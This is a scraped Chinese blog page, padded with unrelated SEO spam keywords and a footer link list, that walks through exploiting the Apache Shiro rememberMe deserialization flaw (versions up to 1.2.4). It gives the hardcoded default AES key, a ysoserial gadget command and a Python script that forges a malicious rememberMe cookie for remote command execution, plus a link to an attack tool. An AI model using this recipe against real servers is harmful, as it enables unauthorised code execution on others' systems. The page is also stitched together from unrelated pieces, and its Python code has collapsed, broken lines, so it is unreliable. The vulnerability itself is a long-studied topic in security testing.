当前位置: 首页 > news >正文

卖机票的网站怎么做万彩动画大师

卖机票的网站怎么做,万彩动画大师,校园推广活动策划方案,wordpress 主页模板一、漏洞特征 Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 因为在反序列化时,不会对其进行过滤,所以如果传入恶意代码将会造成安全问题 在 1.2.4 版本前, 加…

一、漏洞特征
Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
因为在反序列化时,不会对其进行过滤,所以如果传入恶意代码将会造成安全问题
在 1.2.4 版本前, 加密的用户信息序列化后存储在名为remember-me的Cookie中,而且是默认ASE秘钥,Key: kPH+bIxk5D2deZiIxcaaaA==,可攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
而在1.2.4之后,ASE秘钥就不为默认了,需要获取到Key才可以进行渗透
总结一句话:ASE秘钥不能使用已知的外部秘钥,不能泄露秘钥。

影响版本Apache Shiro <= 1.2.4
漏洞特征:
shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段
进入后可以看到有remenber me的登录首页
在这里插入图片描述

二、漏洞复现
1.登录抓包拦截
同时勾选remenber me
在这里插入图片描述在这里插入图片描述

2.生成ser文件
使用ysoserial生成CommonsBeanutils1的Gadget
java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 “touch /tmp/succ123” > poc.ser
在这里插入图片描述

3.使用poc生成payload

import sys
import uuid
import base64
from Crypto.Cipher import AESdef encode_rememberme():f = open('poc.ser','rb')BS = AES.block_sizepad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")iv = uuid.uuid4().bytesencryptor = AES.new(key, AES.MODE_CBC, iv)file_body = pad(f.read())base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))return base64_ciphertextif __name__ == '__main__':payload = encode_rememberme()   
print("rememberMe={0}".format(payload.decode()))

在这里插入图片描述

4.将生成的payload替换到请求包cookie中
在这里插入图片描述

5.进入搭建靶机的机器,查看生成文件
在这里插入图片描述

三、工具利用
https://github.com/SummerSec/ShiroAttack2
在这里插入图片描述在这里插入图片描述

http://www.yayakq.cn/news/79837/

相关文章:

  • 网站有标题东莞免费企业网站模板推广
  • 想做网站去哪里做装修建材网站模板
  • 河北建设广州分公司网站西安网站制作 西安彩铃400电话
  • 手机网站建设推广广州海珠发布
  • 厦门海沧区建设局网站制作网站怎么做
  • 信阳做网站的公司专业定制网站开发
  • 地图 添加到网站宠物网站设计案例
  • 网站有哪些区别是什么意思最新软件开发国家标准
  • 搜索引擎友好的网站有哪些特点什么是网站什么是网站建设
  • 网站开发费用怎么账务处理上海企业名录地址电话
  • 哪家微信网站建设好上海娱乐场所关门
  • asp制作网站黄骅市怎么读
  • 成都代做网站校园网站建设管理
  • 怎么确定网站的关键词石家庄网站建设系统
  • 网站没权重教育机构排名全国十大教育机构排名
  • 网站开发公司 广告词在南海建设工程交易中心网站
  • 网站推广营销应该怎么做二级网站怎么建
  • 自己做一个商城网站怎么做网站开发个人总结
  • 网站服务器上的跳转选择怎么做凡科网代理登陆
  • 商城网站怎么做的网站被采集
  • 广东住房和城乡建设厅网站贵阳网站开发推荐
  • 网站商城开发天津it外包公司
  • 网站建设的目标及服务对象wordpress路径爆出
  • 手机网站菜单网页怎么做的邀请注册推广赚钱的app
  • 摄影网站都有什么地方网站总结
  • 网站从建设到赚钱的流程阿里云怎么建设网站
  • 网站内容有哪些上海装修公司排名榜前30名
  • 成都网站优化实战网站建设太难了
  • 深圳做网站公司哪家比较好centos7全新安装wordpress
  • 做citation的网站可以做代销的网站都有哪些